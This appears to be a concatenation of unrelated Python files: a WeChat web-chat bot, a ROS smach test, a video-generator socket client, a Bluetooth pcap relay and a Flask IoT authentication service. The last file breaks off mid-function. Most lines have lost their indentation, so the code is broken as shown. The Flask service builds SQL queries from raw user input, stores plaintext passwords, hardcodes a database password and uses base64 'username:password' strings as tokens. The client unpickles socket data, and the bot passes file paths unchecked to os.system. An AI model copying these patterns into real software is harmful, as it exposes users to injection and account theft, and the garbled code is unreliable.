# print '[*] 你有新的消息,请注意查收'
logging.debug('[*] 你有新的消息,请注意查收')
if self.DEBUG:
fn = 'msg' + str(int(random.random() * 1000)) + '.json'
with open(fn, 'w') as f:
f.write(json.dumps(msg))
print '[*] 该消息已储存到文件: ' + fn
logging.debug('[*] 该消息已储存到文件: %s' % (fn))
msgType = msg['MsgType']
name = self.getUserRemarkName(msg['FromUserName'])
            content = msg['Content'].replace('&lt;', '<').replace('&gt;', '>')
msgid = msg['MsgId']
if msgType == 1:
raw_msg = {'raw_msg': msg}
self._showMsg(raw_msg)
if self.autoReplyMode:
ans = self._xiaodoubi(content) + '\n[微信机器人自动回复]'
if self.webwxsendmsg(ans, msg['FromUserName']):
print '自动回复: ' + ans
logging.info('自动回复: ' + ans)
else:
print '自动回复失败'
logging.info('自动回复失败')
# elif msgType == 3:
# image = self.webwxgetmsgimg(msgid)
# raw_msg = {'raw_msg': msg,
# 'message': '%s 发送了一张图片: %s' % (name, image)}
# self._showMsg(raw_msg)
# self._safe_open(image)
# elif msgType == 34:
# voice = self.webwxgetvoice(msgid)
# raw_msg = {'raw_msg': msg,
# 'message': '%s 发了一段语音: %s' % (name, voice)}
# self._showMsg(raw_msg)
# self._safe_open(voice)
# elif msgType == 42:
# info = msg['RecommendInfo']
# print '%s 发送了一张名片:' % name
# print '========================='
# print '= 昵称: %s' % info['NickName']
# print '= 微信号: %s' % info['Alias']
# print '= 地区: %s %s' % (info['Province'], info['City'])
# print '= 性别: %s' % ['未知', '男', '女'][info['Sex']]
# print '========================='
# raw_msg = {'raw_msg': msg, 'message': '%s 发送了一张名片: %s' % (
# name.strip(), json.dumps(info))}
# self._showMsg(raw_msg)
# elif msgType == 47:
# url = self._searchContent('cdnurl', content)
# raw_msg = {'raw_msg': msg,
# 'message': '%s 发了一个动画表情,点击下面链接查看: %s' % (name, url)}
# self._showMsg(raw_msg)
# self._safe_open(url)
# elif msgType == 49:
# appMsgType = defaultdict(lambda: "")
# appMsgType.update({5: '链接', 3: '音乐', 7: '微博'})
# print '%s 分享了一个%s:' % (name, appMsgType[msg['AppMsgType']])
# print '========================='
# print '= 标题: %s' % msg['FileName']
# print '= 描述: %s' % self._searchContent('des', content, 'xml')
# print '= 链接: %s' % msg['Url']
# print '= 来自: %s' % self._searchContent('appname', content, 'xml')
# print '========================='
# card = {
# 'title': msg['FileName'],
# 'description': self._searchContent('des', content, 'xml'),
# 'url': msg['Url'],
# 'appname': self._searchContent('appname', content, 'xml')
# }
# raw_msg = {'raw_msg': msg, 'message': '%s 分享了一个%s: %s' % (
# name, appMsgType[msg['AppMsgType']], json.dumps(card))}
# self._showMsg(raw_msg)
# elif msgType == 51:
# raw_msg = {'raw_msg': msg, 'message': '[*] 成功获取联系人信息'}
# self._showMsg(raw_msg)
# elif msgType == 62:
# video = self.webwxgetvideo(msgid)
# raw_msg = {'raw_msg': msg,
# 'message': '%s 发了一段小视频: %s' % (name, video)}
# self._showMsg(raw_msg)
# self._safe_open(video)
# elif msgType == 10002:
# raw_msg = {'raw_msg': msg, 'message': '%s 撤回了一条消息' % name}
# self._showMsg(raw_msg)
# else:
# logging.debug('[*] 该消息类型为: %d,可能是表情,图片, 链接或红包: %s' %
# (msg['MsgType'], json.dumps(msg)))
# raw_msg = {
# 'raw_msg': msg, 'message': '[*] 该消息类型为: %d,可能是表情,图片, 链接或红包' % msg['MsgType']}
# self._showMsg(raw_msg)
def listenMsgMode(self):
print '[*] 进入消息监听模式 ... 成功'
logging.debug('[*] 进入消息监听模式 ... 成功')
self._run('[*] 进行同步线路测试 ... ', self.testsynccheck)
playWeChat = 0
redEnvelope = 0
while True:
self.lastCheckTs = time.time()
[retcode, selector] = self.synccheck()
if self.DEBUG:
print 'retcode: %s, selector: %s' % (retcode, selector)
logging.debug('retcode: %s, selector: %s' % (retcode, selector))
if retcode == '1100':
print '[*] 你在手机上登出了微信,债见'
logging.debug('[*] 你在手机上登出了微信,债见')
break
if retcode == '1101':
print '[*] 你在其他地方登录了 WEB 版微信,债见'
logging.debug('[*] 你在其他地方登录了 WEB 版微信,债见')
break
elif retcode == '0':
if selector == '2':
r = self.webwxsync()
if r is not None:
self.handleMsg(r)
elif selector == '6':
# TODO
redEnvelope += 1
print '[*] 收到疑似红包消息 %d 次' % redEnvelope
logging.debug('[*] 收到疑似红包消息 %d 次' % redEnvelope)
r = self.webwxsync()
elif selector == '7':
playWeChat += 1
print '[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat
logging.debug('[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat)
r = self.webwxsync()
elif selector == '0':
time.sleep(1)
if (time.time() - self.lastCheckTs) <= 20:
time.sleep(time.time() - self.lastCheckTs)
def sendMsg(self, name, word, isfile=False):
id = self.getUSerID(name)
if id:
if isfile:
with open(word, 'r') as f:
for line in f.readlines():
line = line.replace('\n', '')
self._echo('-> ' + name + ': ' + line)
if self.webwxsendmsg(line, id):
print ' [成功]'
else:
print ' [失败]'
time.sleep(1)
else:
if self.webwxsendmsg(word, id):
print '[*] 消息发送成功'
logging.debug('[*] 消息发送成功')
else:
print '[*] 消息发送失败'
logging.debug('[*] 消息发送失败')
else:
print '[*] 此用户不存在'
logging.debug('[*] 此用户不存在')
def sendMsgToAll(self, word):
for contact in self.ContactList:
name = contact['RemarkName'] if contact[
'RemarkName'] else contact['NickName']
id = contact['UserName']
self._echo('-> ' + name + ': ' + word)
if self.webwxsendmsg(word, id):
print ' [成功]'
else:
print ' [失败]'
time.sleep(1)
def sendImg(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgimg(user_id, media_id)
def sendEmotion(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgemotion(user_id, media_id)
@catchKeyboardInterrupt
def start(self):
self._echo('[*] 微信网页版 ... 开动')
print
logging.debug('[*] 微信网页版 ... 开动')
while True:
self._run('[*] 正在获取 uuid ... ', self.getUUID)
self._echo('[*] 正在获取二维码 ... 成功')
print
logging.debug('[*] 微信网页版 ... 开动')
self.genQRCode()
print '[*] 请使用微信扫描二维码以登录 ... '
if not self.waitForLogin():
continue
print '[*] 请在手机上点击确认以登录 ... '
if not self.waitForLogin(0):
continue
break
self._run('[*] 正在登录 ... ', self.login)
self._run('[*] 微信初始化 ... ', self.webwxinit)
self._run('[*] 开启状态通知 ... ', self.webwxstatusnotify)
self._run('[*] 获取联系人 ... ', self.webwxgetcontact)
self._echo('[*] 应有 %s 个联系人,读取到联系人 %d 个' %
(self.MemberCount, len(self.MemberList)))
print
self._echo('[*] 共有 %d 个群 | %d 个直接联系人 | %d 个特殊账号 | %d 公众号或服务号' % (len(self.GroupList),
len(self.ContactList), len(self.SpecialUsersList), len(self.PublicUsersList)))
print
self._run('[*] 获取群 ... ', self.webwxbatchgetcontact)
logging.debug('[*] 微信网页版 ... 开动')
if self.DEBUG:
print self
logging.debug(self)
if self.interactive and raw_input('[*] 是否开启自动回复模式(y/n): ') == 'y':
self.autoReplyMode = True
print '[*] 自动回复模式 ... 开启'
logging.debug('[*] 自动回复模式 ... 开启')
else:
print '[*] 自动回复模式 ... 关闭'
logging.debug('[*] 自动回复模式 ... 关闭')
if sys.platform.startswith('win'):
import thread
            thread.start_new_thread(self.listenMsgMode, ())
else:
listenProcess = multiprocessing.Process(target=self.listenMsgMode)
listenProcess.start()
while True:
text = raw_input('')
if text == 'quit':
listenProcess.terminate()
print('[*] 退出微信')
logging.debug('[*] 退出微信')
exit()
elif text[:2] == '->':
[name, word] = text[2:].split(':')
if name == 'all':
self.sendMsgToAll(word)
else:
self.sendMsg(name, word)
elif text[:3] == 'm->':
[name, file] = text[3:].split(':')
self.sendMsg(name, file, True)
elif text[:3] == 'f->':
print '发送文件'
logging.debug('发送文件')
elif text[:3] == 'i->':
print '发送图片'
[name, file_name] = text[3:].split(':')
self.sendImg(name, file_name)
logging.debug('发送图片')
elif text[:3] == 'e->':
print '发送表情'
[name, file_name] = text[3:].split(':')
self.sendEmotion(name, file_name)
logging.debug('发送表情')
def _safe_open(self, path):
if self.autoOpen:
if platform.system() == "Linux":
os.system("xdg-open %s &" % path)
else:
os.system('open %s &' % path)
def _run(self, str, func, *args):
self._echo(str)
if func(*args):
print '成功'
logging.debug('%s... 成功' % (str))
else:
print('失败\n[*] 退出程序')
logging.debug('%s... 失败' % (str))
logging.debug('[*] 退出程序')
exit()
def _echo(self, str):
sys.stdout.write(str)
sys.stdout.flush()
def _printQR(self, mat):
for i in mat:
BLACK = '\033[40m \033[0m'
WHITE = '\033[47m \033[0m'
print ''.join([BLACK if j else WHITE for j in i])
def _str2qr(self, str):
print(str)
qr = qrcode.QRCode()
qr.border = 1
qr.add_data(str)
qr.make()
# img = qr.make_image()
# img.save("qrcode.png")
#mat = qr.get_matrix()
#self._printQR(mat) # qr.print_tty() or qr.print_ascii()
qr.print_tty()
def _transcoding(self, data):
if not data:
return data
result = None
if type(data) == unicode:
result = data
elif type(data) == str:
result = data.decode('utf-8')
return result
def _get(self, url, api=None):
request = urllib2.Request(url=url)
request.add_header('Referer', 'https://wx.qq.com/')
if api == 'webwxgetvoice':
request.add_header('Range', 'bytes=0-')
if api == 'webwxgetvideo':
request.add_header('Range', 'bytes=0-')
try:
response = urllib2.urlopen(request)
data = response.read()
logging.debug(url)
return data
except urllib2.HTTPError, e:
logging.error('HTTPError = ' + str(e.code))
except urllib2.URLError, e:
logging.error('URLError = ' + str(e.reason))
except httplib.HTTPException, e:
logging.error('HTTPException')
except Exception:
import traceback
logging.error('generic exception: ' + traceback.format_exc())
return ''
def _post(self, url, params, jsonfmt=True):
if jsonfmt:
request = urllib2.Request(url=url, data=json.dumps(params))
request.add_header(
                'Content-Type', 'application/json; charset=UTF-8')
else:
request = urllib2.Request(url=url, data=urllib.urlencode(params))
try:
response = urllib2.urlopen(request)
data = response.read()
if jsonfmt:
return json.loads(data, object_hook=_decode_dict)
return data
except urllib2.HTTPError, e:
logging.error('HTTPError = ' + str(e.code))
except urllib2.URLError, e:
logging.error('URLError = ' + str(e.reason))
except httplib.HTTPException, e:
logging.error('HTTPException')
except Exception:
import traceback
logging.error('generic exception: ' + traceback.format_exc())
return ''
def _xiaodoubi(self, word):
url = 'http://www.xiaodoubi.com/bot/chat.php'
try:
r = requests.post(url, data={'chat': word})
return r.content
except:
return "让我一个人静静 T_T..."
def _simsimi(self, word):
key = ''
url = 'http://sandbox.api.simsimi.com/request.p?key=%s&lc=ch&ft=0.0&text=%s' % (
key, word)
r = requests.get(url)
ans = r.json()
if ans['result'] == '100':
return ans['response']
else:
return '你在说什么,风太大听不清列'
def _searchContent(self, key, content, fmat='attr'):
if fmat == 'attr':
pm = re.search(key + '\s?=\s?"([^"<]+)"', content)
if pm:
return pm.group(1)
elif fmat == 'xml':
pm = re.search('<{0}>([^<]+)</{0}>'.format(key), content)
if not pm:
pm = re.search(
'<{0}><\!\[CDATA\[(.*?)\]\]></{0}>'.format(key), content)
if pm:
return pm.group(1)
return '未知'
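    # Illustrative calls (values are made up): with fmat='attr' the helper pulls
    # an attribute-style value, e.g. it returns "http://emoji.example/x.gif"
    # from 'cdnurl = "http://emoji.example/x.gif"', while fmat='xml' extracts
    # the text of a tag such as <des>hello</des> (optionally CDATA-wrapped),
    # and '未知' is returned when nothing matches.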
class UnicodeStreamFilter:
def __init__(self, target):
self.target = target
self.encoding = 'utf-8'
self.errors = 'replace'
self.encode_to = self.target.encoding
def write(self, s):
if type(s) == str:
s = s.decode('utf-8')
s = s.encode(self.encode_to, self.errors).decode(self.encode_to)
self.target.write(s)
def flush(self):
self.target.flush()
if sys.stdout.encoding == 'cp936':
sys.stdout = UnicodeStreamFilter(sys.stdout)
if __name__ == '__main__':
logger = logging.getLogger(__name__)
if not sys.platform.startswith('win'):
import coloredlogs
coloredlogs.install(level='DEBUG')
webwx = WebWeixin()
webwx.start()
|
ism_test.py
|
#!/usr/bin/env python
'''
Copyright (c) 2016, Allgeyer Tobias, Aumann Florian, Borella Jocelyn, Hutmacher Robin, Karrenbauer Oliver, Marek Felix, Meissner Pascal, Trautmann Jeremias, Wittenbeck Valerij
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import roslib
import rospy
import smach
import smach_ros
import threading
from pose_sampling import *
# To import files from parent directories
if __name__ == '__main__' and __package__ is None:
from os import sys, path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from indirect_search.ism import SceneRecognition, PosePrediction
from common.object_detection import ObjectDetection
from common.init import clear_world_model
from geometry_msgs.msg import Pose, Point, Quaternion
class ISMInit(smach.State):
def __init__(self):
smach.State.__init__(
self,
outcomes=['succeeded'],
output_keys=['searched_object_types'])
def execute(self, userdata):
clear_world_model()
# objects used in the scenario
userdata.searched_object_types = ['PlateDeep', 'Smacks', 'CupPdV']
return 'succeeded'
def main():
rospy.init_node('object_detection_sm')
sm_object_detection = smach.StateMachine(outcomes=['succeeded',
'aborted',
'no_objects_found',
'found_all_required_scenes',
'found_all_objects',
'no_predictions_left'])
with sm_object_detection:
smach.StateMachine.add("INIT",
ISMInit(),
transitions={'succeeded': 'OBJECT_DETECTION'},
remapping={'searched_object_types':'searched_object_types'})
smach.StateMachine.add('OBJECT_DETECTION',
ObjectDetection(),
transitions={'no_objects_found':'no_objects_found',
'found_objects':'SCENE_RECOGNITION',
'aborted':'aborted'},
remapping={'searched_object_types':'searched_object_types',
'detected_objects':'detected_objects'})
smach.StateMachine.add('SCENE_RECOGNITION',
SceneRecognition(),
transitions={'found_scenes':'OBJECT_POSE_PREDICTION',
'found_all_required_scenes':'found_all_required_scenes',
'found_all_objects':'found_all_objects',
'aborted':'aborted'})
smach.StateMachine.add('OBJECT_POSE_PREDICTION',
PosePrediction(),
transitions={'succeeded':'succeeded',
'aborted':'aborted',
'no_predictions_left':'no_predictions_left'},
remapping={'object_pointcloud':'object_pointcloud'})
    # smach.set_preempt_handler(sm_main)
smach_thread = threading.Thread(target = sm_object_detection.execute)
smach_thread.start()
rospy.spin()
rospy.signal_shutdown('All done.')
if __name__ == '__main__':
try:
main()
except rospy.ROSInterruptException: pass
|
generatorclient.py
|
import socket
from threading import Thread
import datetime
import pickle
import hashlib
import youtubequeue
musicTypes = None
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
last_upload_times = None
isRequestingScripts = False
# Connect the socket to the port where the server is listening
server_address = ('localhost', 11000)
def flagscript(scriptno, flagtype):
print("%s VID GEN CLIENT requesting to flag script" % datetime.datetime.now())
payload = ("flag-scripts", scriptno, flagtype)
sendToServer(sock, payload)
def updateUploadDetails(scriptno, timeuploaded, scedualedrelease):
payload = ("fin-script", scriptno, timeuploaded, scedualedrelease)
sendToServer(sock, payload)
def login(username, password):
payload = ("login-attempt-generator", username, hashlib.md5(password.encode()).hexdigest())
sendToServer(sock, payload)
def getLastUploadedScripts():
print("%s VID GEN CLIENT requesting last uploaded vids" % datetime.datetime.now())
payload = ("last-uploaded",)
sendToServer(sock, payload)
def sendToServer(server, payloadattachment):
payload_attach = pickle.dumps(payloadattachment)
HEADERSIZE = 10
payload = bytes(f"{len(payload_attach):<{HEADERSIZE}}", 'utf-8') + payload_attach
server.sendall(payload)
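# Framing sketch: every payload is pickled and prefixed with a 10-character,
# left-aligned ASCII length header, which downloadListenThread uses on the
# receiving side to know when the full message has arrived. Illustrative only:
#     payload_attach = pickle.dumps(("last-uploaded",))
#     header = bytes(f"{len(payload_attach):<10}", 'utf-8')  # length, left-padded to 10 chars
#     sock.sendall(header + payload_attach)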
# change scriptIBuffer to scriptnos
def requestScripts(current_scripts):
global isRequestingScripts
isRequestingScripts = True
print("%s VID GEN CLIENT requesting scripts current (%s)" % (datetime.datetime.now(), current_scripts))
payload = ("video-generator-request-scripts", current_scripts)
sendToServer(sock, payload)
def connectToServer():
print('video generator connecting to %s port %s' % server_address)
try:
sock.connect(server_address)
except ConnectionRefusedError:
input("Could not connect to server. Press enter to continue")
exit()
thread = Thread(target=downloadListenThread)
thread.start()
def downloadListenThread():
global last_upload_times, isRequestingScripts, musicTypes
print("Client listen thread active")
HEADERSIZE = 10
while True:
full_msg = b''
new_msg = True
while True:
try:
buf = sock.recv(2048)
except OSError:
# happens when disconnecting
break
if new_msg:
msglen = int(buf[:HEADERSIZE])
print("%s VID GEN CLIENT new message (%s)" %( datetime.datetime.now(), msglen))
new_msg = False
full_msg += buf
#print("%s VID GEN CLIENT received %s%% (%s/%s)" % (datetime.datetime.now(), round(len(full_msg) / msglen * 100, 2), str(len(full_msg) / 1000000) + "MB", str(msglen / 1000000) + "MB"))
if len(full_msg) - HEADERSIZE == msglen:
print("%s VID GEN CLIENT received full message (%s)" % (datetime.datetime.now(), len(full_msg) - HEADERSIZE))
incomingdata = pickle.loads(full_msg[HEADERSIZE:])
new_msg = True
full_msg = b""
if incomingdata[0] == "login-success":
print("VID GEN LOGIN SUCCESS")
pass
elif incomingdata[0] == "script-send-to-generator":
scripts = incomingdata[1]
musicTypes = incomingdata[2]
print("%s VID GEN CLIENT received %s scripts" % (
datetime.datetime.now(), len(scripts)))
for script in scripts:
youtubequeue.scriptIBuffer.append(script)
youtubequeue.parseScripts()
isRequestingScripts = False
elif incomingdata[0] == "last-uploaded":
last_times = incomingdata[1]
last_upload_times = last_times
print("%s VID GEN CLIENT received last upload times" % (
datetime.datetime.now()))
|
bt.py
|
#!/usr/bin/python
import bluetooth, os, time, sys, threading
# The in directory for new pcap files
PCAP_DIR = "/tmp/pcaps"
GPSPATH = '/tmp/gpsfifo'
SERVICE_NAME = "EyeOfTechnology"
LOGFILE = "/var/log/iot.log"
is_running = True
def _curr_time():
return time.strftime("%Y-%m-%d %H:%M:%S")
def _format_log(logstring):
return _curr_time() + ": " + logstring + "\n"
"""
def bt_loop(ld):
'''
Connects to a device and then transmits pcaps.
'''
ld.write(_format_log("Staring service"))
sock=bluetooth.BluetoothSocket(bluetooth.RFCOMM)
ld.write(_format_log("Got bluetooth socket"))
# All the services with this name should be fine
service_desc = get_connection(ld)
# Getting service information
port = service_desc['port']
target_address = service_desc['host']
# Connecting to the device
sock.connect((target_address, port))
ld.write(_format_log("Connected to android device"))
while True:
# Loop through the in directory and send over files
time.sleep(2)
files = os.listdir(PCAP_DIR)
for f in files:
fd = open(PCAP_DIR + '/' + f, 'rb')
temp = fd.read()
sock.send(temp)
ld.write(_format_log("Sending " + f))
fd.close()
os.remove(PCAP_DIR + "/" + f)
"""
"""
def receive_loop(ld):
ld.write(_format_log("Staring service"))
sock=bluetooth.BluetoothSocket(bluetooth.RFCOMM)
ld.write(_format_log("Got bluetooth socket"))
# All the services with this name should be fine
service_desc = get_connection(ld)
# Getting service information
port = service_desc['port']
target_address = service_desc['host']
# Connecting to the device
sock.connect((target_address, port))
ld.write(_format_log("Connected to android device"))
while True:
time.sleep(2)
print "Getting data"
data = sock.recv(1024)
print "Data: " + data
"""
def send_data(ld, sock):
global is_running
while is_running:
try:
# Loop through the in directory and over files
time.sleep(2)
files = os.listdir(PCAP_DIR)
for f in files:
fn, fe = os.path.splitext(f)
if fe == ".pcap":
fd = open(PCAP_DIR + '/' + f, 'rb')
temp = fd.read()
sock.send(str(len(temp)).zfill(8))
sock.sendall(temp)
#ld.write(_format_log("Sending " + f))
fd.close()
os.remove(PCAP_DIR + "/" + f)
except Exception as e:
is_running = False
#ld.write(_format_log(str(e)))
#ld.write(_format_log("Send thread stopped"))
def receive_data(ld, sock):
global is_running
while is_running:
try:
time.sleep(7)
data = sock.recv(200)
with open (GPSPATH, 'w') as fd:
fd.write(data + ";\n")
except Exception as e:
is_running = False
#ld.write(_format_log(str(e)))
#ld.write(_format_log("Receive thread stopped"))
def connect_bluetooth(ld):
socket = get_bluetooth_socket(ld)
# any service with the name should be fine
service = get_bluetooth_services(ld, SERVICE_NAME)[0]
socket.connect((service['host'], service['port']))
#ld.write(_format_log("Connected to android device"))
return socket
def get_bluetooth_services(ld, name):
services = []
while len(services) < 1:
try:
# Search for the service
services = bluetooth.find_service(name=name)
except bluetooth.btcommon.BluetoothError as e:
error_msg = str(e)
#if not error_msg == "error accessing bluetooth device":
#ld.write(_format_log(str(e)))
return services
def get_bluetooth_socket(ld):
sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
#ld.write(_format_log("Got bluetooth socket"))
return sock
def setup_logs(path):
if os.path.isfile(path):
return open(path, 'a', 0)
else:
return open(path, 'w', 0)
def start_threads(ld, sock):
sock.setblocking(True)
s = threading.Thread(target=send_data, args=(ld, sock))
r = threading.Thread(target=receive_data, args=(ld, sock))
s.start()
r.start()
return s, r
def handle_exception(ld, e, sock):
    global is_running
    is_running = False
    if sock is not None:
        sock.close()
    #ld.write(_format_log(str(e)))
    #ld.write(_format_log("Out of send and receive threads"))
    is_running = True
    #ld.write(_format_log("Restarting service"))
if __name__=="__main__":
#ld = setup_logs(LOGFILE)
#ld.write(_format_log("Starting service"))
ld = None
while True:
socket = None
is_running = True
try:
socket = connect_bluetooth(ld)
s, r = start_threads(ld, socket)
s.join()
r.join()
except Exception as e:
handle_exception(ld, e, socket)
|
combined.py
|
from flask import Flask, request, render_template,jsonify
from flask_restful import Resource, Api
import mysql.connector
import json
import requests
import base64
import os
import zipfile
import re
import shutil
import requests
import time
import threading
from json import loads
from kafka import KafkaConsumer
'''
Sensor manager - 5050
Sensor Registration - 5051
Action Manager - 5052
Scheduler - 5053
Server LCM - 5054
Service LCM - 8080
Monitoring - 5055
Request Manager- 5056, 5057
Deployment - 5058
'''
app = Flask(__name__)
api = Api(app)
UPLOAD_FOLDER_APP = '/home/'
ALLOWED_EXTENSIONS_ZIP = {'zip'}
app.config['UPLOAD_FOLDER_APP'] = UPLOAD_FOLDER_APP
UPLOAD_FOLDER_SENSOR = '/home/'
ALLOWED_EXTENSIONS_JSON = {'json'}
app.config['UPLOAD_FOLDER_SENSOR'] = UPLOAD_FOLDER_SENSOR
kafkaDict = dict()
URL="0.0.0.0"
PORT=5056
PROTO="http://"
USER_TABLE_NAME = "user"
UPLOADS_TABLE_NAME = "useruploadss"
DB_NAME = "iot"
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
#This is the first process. It needs to create database and tables
query = "create database if not exists "+DB_NAME
cursor.execute(query)
query = "use "+DB_NAME
cursor.execute(query)
query = "create table if not exists "+USER_TABLE_NAME+"(username varchar(30), password varchar(30), token varchar(1000))"
cursor.execute(query)
query = "create table if not exists "+UPLOADS_TABLE_NAME+"(username varchar(30), appname varchar(30), serviceid varchar(30),servicename varchar(50), status varchar(20), scheduled varchar(20))"
cursor.execute(query)
#checks end here
mydb.commit()
cursor.close()
mydb.close()
class login(Resource):
def get(self):
return jsonify(token=-2)
def post(self):
authparams = request.get_json(force=True)
print("Login request from ",authparams["username"],"pass = ",authparams["password"])
global PROTO
URL_loc = PROTO + URL + ":" + str(PORT) + "/auth"
authparams["type"] = "generate"
authparams = json.dumps(authparams)
req = requests.post(url=URL_loc,data=authparams)
# the req has the token. The token is returned to the request
return json.loads(req.text)
class signup(Resource):
def get(self):
return jsonify(status="failure",message="no Parameters received. Expecting username and password")
def post(self):
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
authparams = request.get_json(force=True)
username = authparams["username"]
password = authparams["password"]
print("Signup request from "+authparams["username"],"pass = ",authparams["password"])
query = "select * from "+USER_TABLE_NAME+" where username = \""+username+"\""
cursor.execute(query)
#print(cursor.rowcount," <- cursor row count")
if cursor.rowcount <= 0:
#not an existing user
query = "insert into "+USER_TABLE_NAME+" values(\""+username+"\",\""+password+"\",\"\")"
cursor.execute(query)
mydb.commit()
cursor.close()
mydb.close()
return jsonify(status="success")
elif cursor.rowcount == 1:
#there is a user with same username
print("User exists by name "+username)
mydb.commit()
cursor.close()
mydb.close()
#print("User exists")
return jsonify(status="failure",message="User exists. Try login.")
elif cursor.rowcount >1:
            # multiple users with the same name; this should not happen
mydb.commit()
cursor.close()
mydb.close()
return jsonify(status="failure",message="Unknown Error")
return jsonify(status="failure",message="Unknown Error")
class authorize(Resource):
def get(self,num):
return jsonify(result="failure",message="Get is not a valid request. Please create POST request.")
def post(self):
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
recvd_params = request.get_json(force=True)
if recvd_params["type"] == "generate":
username = recvd_params["username"]
password = recvd_params["password"]
message = username + ":" + password
query1 = "select * from "+USER_TABLE_NAME+" where username = \"" + username + "\""
cursor.execute(query1)
if cursor.rowcount <= 0:
#print("Got params "+username+","+password+" but did not find user in database")
mydb.commit()
cursor.close()
mydb.close()
return jsonify(status="failure",message="User not registered")
if cursor.rowcount > 1:
#print("Found multiple accounts with username "+username)
mydb.commit()
cursor.close()
mydb.close()
return jsonify(status="failure",message="Multiple Users")
message_bytes = message.encode('ascii')
base_64_bytes = base64.b64encode(message_bytes)
base_64 = base_64_bytes.decode('ascii')
cursor.close()
cursor = mydb.cursor(buffered=True)
query2 = "update user set token=\""+base_64+"\" where username=\""+username+"\";"
cursor.execute(query2)
#print(cursor.rowcount)
if cursor.rowcount == 1:
#print("Row updated for username "+username+" token set to "+base_64)
mydb.commit()
cursor.close()
mydb.close()
return jsonify(token=base_64,status="success")
if cursor.rowcount == 0:
#print("There were no updations. Token was already there ")
mydb.commit()
cursor.close()
mydb.close()
return jsonify(token=base_64,status="success")
#print("Error while updating token for user "+username)
elif recvd_params["type"] == "validate":
base64_message = recvd_params["token"]
base64_bytes = base64_message.encode('ascii')
message_bytes = base64.b64decode(base64_bytes)
message = message_bytes.decode('ascii')
if ":" not in message:
#failure
mydb.commit()
cursor.close()
mydb.close()
#print("Failed as : is not present in the string")
return jsonify(result="failure")
message = message.split(":")
username = message[0]
query = "select * from "+USER_TABLE_NAME+" where username = \""+username + "\""
#print("validating. Username is ",username)
cursor.execute(query)
if cursor.rowcount <= 0:
#failure
mydb.commit()
cursor.close()
mydb.close()
#print("Failed as username ",username," returned 0 rows")
return jsonify(result="failure")
if cursor.rowcount == 1:
                #success
mydb.commit()
cursor.close()
mydb.close()
return jsonify(result="success",username=username)
#other issue
if cursor.rowcount >1:
#multiple users
mydb.commit()
cursor.close()
mydb.close()
print("Multiple users")
return jsonify(result="failure")
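# A hedged, illustrative sketch of how the /auth token round-trips; it mirrors
# the base64 "username:password" scheme used above. The credential values are
# placeholders and the function is not called anywhere in this service.
def _example_token_roundtrip(username="alice", password="secret"):
    token = base64.b64encode((username + ":" + password).encode('ascii')).decode('ascii')
    decoded = base64.b64decode(token.encode('ascii')).decode('ascii')
    assert decoded.split(":")[0] == username
    return token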
class request_manager_backend(Resource):
def get(self):
return jsonify(status="failure",message="GET request not valid. Please POST token")
def post(self):
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
params = request.get_json(force=True)
username = params["username"]
# print("Req manager sending dashboard update for user "+username)
#print("################## REQ MANAGER SENDING AN UPDATE for "+username+" ####")
query = "select appname,serviceid,servicename,status,scheduled from "+UPLOADS_TABLE_NAME+" where username=\""+username+"\""
cursor.execute(query)
counter = 0
mainlist = list()
for x in cursor:
appname = x[0]
serviceid = x[1]
servicename = x[2]
status = x[3]
scheduled = x[4]
innerdict = dict()
innerdict["serviceid"]= serviceid
innerdict["servicename"]=servicename
innerdict["status"]=status
innerdict["scheduled"] = scheduled
maindict = dict()
found = False
for i in mainlist:
if i["appname"]==appname:
found = True
maindict = i
if found == True:
maindict["data"].append(innerdict)
else:
maindict["data"] = list()
maindict["data"].append(innerdict)
maindict["appname"] = appname
mainlist.append(maindict)
response = json.dumps(mainlist)
cursor.close()
mydb.commit()
mydb.close()
#print("################## REQ MANAGER SENDING AN UPDATE for "+username+" ENDS HERE ########")
return response
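# A hedged sketch, not used by the resource above: the same per-app grouping
# done with a dict keyed by appname, which avoids rescanning ``mainlist`` for
# every row. Row tuples are assumed to follow the SELECT column order above.
def _group_rows_by_app_example(rows):
    grouped = {}
    for appname, serviceid, servicename, status, scheduled in rows:
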